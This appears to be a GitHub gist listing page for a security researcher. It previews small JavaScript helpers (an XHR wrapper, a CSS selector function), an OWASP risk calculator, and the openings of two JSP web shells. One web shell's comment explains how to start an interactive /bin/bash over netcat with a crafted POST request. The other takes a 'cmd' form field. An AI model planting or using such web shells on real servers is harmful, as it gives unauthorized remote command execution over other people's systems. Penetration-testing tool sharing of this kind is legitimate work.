Eros Lever ErosLever
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // License: public domain - original author: Eros Lever - https://gist.github.com/ErosLever/1c555eaca5d2bc07fc73bae7c550f1f5 | |
| // Inspired by tinyxhr.js (https://gist.github.com/4706967) and empijei (https://github.com/empijei) | |
| uxhr=(u,c,d,h,p,m)=>(K=(z,f)=>z?Object.keys(z).map(f):0,e=encodeURIComponent,x=new XMLHttpRequest,x.open(m?m:d?'POST':'GET',u),K(h,k=>x.setRequestHeader(k,h[k])),K(p,k=>x[k]=p[k]),x.onload=_=>c(x),x.send(d?d.trim?d:K(d,k=>e(k)+'='+e(d[k])).join('&'):'')); | |
| /* | |
| // Example usages: | |
| uxhr("/logout",(x)=>alert(x.responseText)) | |
| uxhr("/login",(x)=>alert(x.responseText),{username:'admin',password:'admin'}) | |
| uxhr("/api",(x)=>alert(x.responseText),JSON.stringify({test:1234}),{'Content-Type':'application/json'}) |
ErosLever
/ get-css-selector.js
Last active
December 13, 2024 20:49
JS GetCssSelector function - Handy function to get the full CSS selector of any element in the page
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // you can include this from: https://cdn.rawgit.com/ErosLever/51c794dc1f2bab888f571e47275c85cd/raw/get-css-selector.js | |
| /** | |
| * Handy function to get the full CSS selector of any element in a web page | |
| * @param {Element} e - the Element whose selector will be returned | |
| * @returns {string} s - the complete CSS Selector including all ancestors elements | |
| */ | |
| function getFullSelector(e){ | |
| var s = "", t, i, c, p, n; | |
| do{ | |
| t = e.tagName.toLowerCase(); |
ErosLever
/ owasp-risk-rating.html
Last active
November 25, 2022 15:51
This is a quick and dirty OWASP Risk Rating Calculator. (demo: https://tinyurl.com/owasp-calculator )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- access this at: https://tinyurl.com/owasp-calculator --> | |
| <html><head> | |
| <style> | |
| @import url('https://fonts.googleapis.com/css?family=Palanquin:400,700&display=swap'); | |
| html { | |
| font-size: 16px !important; | |
| } | |
| body { | |
| background-color: #000; | |
| background-image: url(https://www.securenetwork.it/assets/images/bg-black.png); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| If you use this from netcat, generate a POST request, and the POST data will be the stdin for the | |
| started command. | |
| NOTE: it can be interactive! :) (Just set an overlong Content-Length, and hit CTRL+D when you're done) | |
| Otherwise, you can still use a simple GET | |
| $> nc 127.0.0.1 8080 | |
| POST /cmd-interactive.jsp?cmd=/bin/bash HTTP/1.0 <== start an interactive shell | |
| Host: 127.0.0.1 | |
| Content-Length: 99999 <== set this to a big-enough amount |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form method="GET" action=""> | |
| <input type="text" name="cmd" /> | |
| <input type="submit" value="Exec!" /> | |
| </form> <%! | |
| public String esc(String str){ | |
| StringBuffer sb = new StringBuffer(); | |
| for(char c : str.toCharArray()) | |
| if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) | |
| sb.append( c ); | |
| else |